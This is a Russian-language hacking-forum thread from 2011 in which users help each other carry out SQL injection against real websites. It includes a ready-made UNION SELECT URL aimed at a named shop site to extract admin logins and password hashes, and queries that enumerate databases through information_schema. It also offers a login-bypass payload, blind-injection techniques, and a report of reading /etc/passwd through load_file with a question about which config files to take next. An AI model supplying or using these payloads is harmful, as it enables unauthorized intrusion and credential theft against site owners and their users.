ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.01.2011, 20:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
3318
Репутация:
0
|
|
Skipp ,
http://***.ru/catalog.php?productid=2654+and+1=0+union+select+1, 2,3,4,5,6,7,8,username,password,10,11,12,13,14,15, 16,17,18,19,20+from+imya bd.jos_users+limit+0,1--+
|
|
|
|
20.01.2011, 22:12
|
|
Новичок
Регистрация: 12.05.2010
Сообщений: 2
Провел на форуме:
33215
Репутация:
0
|
|
xarko_v По твоему способу тоже не выводит.
Я уже пробовал по разному:
Сообщение от None
http://***.ru/catalog.php?productid=2654+and+1=0+union+select+1, 2,3,4,5,6,7,8,username,password,10,11,12,13,14,15, 16,17,18,19,20+from+bestshop_belklimat (здесь все базы пробовал подставлять)+where+table_name=jos_users (также имя таблицы подставлял в HEX)+limit+0,1--+
Сообщение от Gorev
Gorev said:
я не буду говорить как, дам наводку, там 3 базы..
belklimat
bestshop_bestshop
bestshop_plenki
чуешь?
Команда database() говорит что я работаю с БД bestshop_belklimat. Пробовал подставлять все базы по очереди и в запрос от xarko_v и в свой выше указанный. Что ещё посоветуете?
|
|
|
20.01.2011, 22:16
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Skipp
Skipp said:
xarko_v
По твоему способу тоже не выводит.
Я уже пробовал по разному:
Команда database() говорит что я работаю с БД bestshop_belklimat. Пробовал подставлять все базы по очереди и в запрос от
xarko_v
и в свой выше указанный. Что ещё посоветуете?
да там уже шеллов как граблей наверное на твоем сайте...пасс сбрутили уже давно
|
|
|
|
20.01.2011, 22:17
|
|
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме:
115871
Репутация:
16
|
|
http://www.belklimat.by/catalog.php?productid=2654+and+1=0+union+select+1, 2,3,4,5,6,7,8,concat%28username,0x3a,password%29,1 0,11,12,13,14,15,%2016,17,18,19,20+from+bestshop_b estshop.jos_users+limit+0,1--+
вот готовый запрос для хэша и логина
чтоб в следующий раз такие вопросы не задавать, хоть примерно пойми синтаксис запросов и статьи повнимательней почитай
|
|
|
|
20.01.2011, 22:35
|
|
Новичок
Регистрация: 12.05.2010
Сообщений: 2
Провел на форуме:
33215
Репутация:
0
|
|
Спасибо, приму во внимание.
|
|
|
|
20.01.2011, 23:09
|
|
Новичок
Регистрация: 12.05.2010
Сообщений: 2
Провел на форуме:
33215
Репутация:
0
|
|
А как можно узнать количество и имена БД?
|
|
|
|
20.01.2011, 23:23
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от Skipp
Skipp said:
А как можно узнать количество и имена БД?
а когда вы начнете читать? =\
group_concat(schema_name) from information_schema.schemata
кол.во - count(schema_name) from information_schema.schemata
|
|
|
|
21.01.2011, 10:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
191387
Репутация:
6
|
|
нашел на одном сайте при вводе логина и пасса ставлю кавычку (') пишет:
Не удалось выполнить запрос!
подскажите какие еще запросы есть наподобие (' or 1=1)
|
|
|
|
21.01.2011, 18:45
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме:
195619
Репутация:
10
|
|
Сообщение от noviyuser
noviyuser said:
нашел на одном сайте при вводе логина и пасса ставлю кавычку (') пишет:
Не удалось выполнить запрос!
подскажите какие еще запросы есть наподобие (' or 1=1)
Рекомендую читать мануалы по иньекциям(см. раздел Статьи), хотя имхо иньекция в авторизации сейчас большая редкость. Если коротко в данном случае я бы рекомендовал использовать что-то типа Admin'+--+ где Admin - логин администратора а комментарий -- отсекает проверку пароля. Возможно после кавычки надо будет добавить закрывающую скобку, возможно не одну. И если кавычка реально работает то вместо комментария -- скорее всего можно использовать /* если речь идет о mysql.
Теперь мой вопрос:
Столкнулся со слепой иньекцией типа union+select+555+--+, ошибка не выводится, но выводится название товара с id=555. Товаров достаточно много, так что теоретически существует возможность создать словарик соответствий выводимого названия товара и инжектируемого айди. После чего уже быстро получать значение нужной переменной, ибо на один символ будет приходиться один запрос.
Вопрос в том, существуют ли уже какие-то тулзы для автоматизации этого процесса и если нету, то есть ли в такой тулзе необходимость ибо руки не из жопу растут, могу и написать.
В принципе согласен можно и не заморачиваться и стандартными методами blind раскручивать, но это не интересно и кроме в моем случае кое-какие символы фильтруются и проги эту иньекцию не кушают.
|
|
|
|
21.01.2011, 22:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
191387
Репутация:
6
|
|
загрузил файл /etc/passwd через sql injection
(и дальше наподобие)
#loginass:1002:65533::0:0::/var/www/xxx.xxx.com:/usr/local/bin/bash
#login1ass1:1000:1000::0:0:user1:/home/alx:/sbin/nologin
получается login и pass от домена xxx.xxx.com/admin ?
blabla:*:1001:65533:ftp-access to xxx.xxx.net:/var/www/xxx.xxx.net/docs:/sbin/nologin
а это что значит? какие еще значения можно загрузить через load file() имею ввиду конфигурационные файлы
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
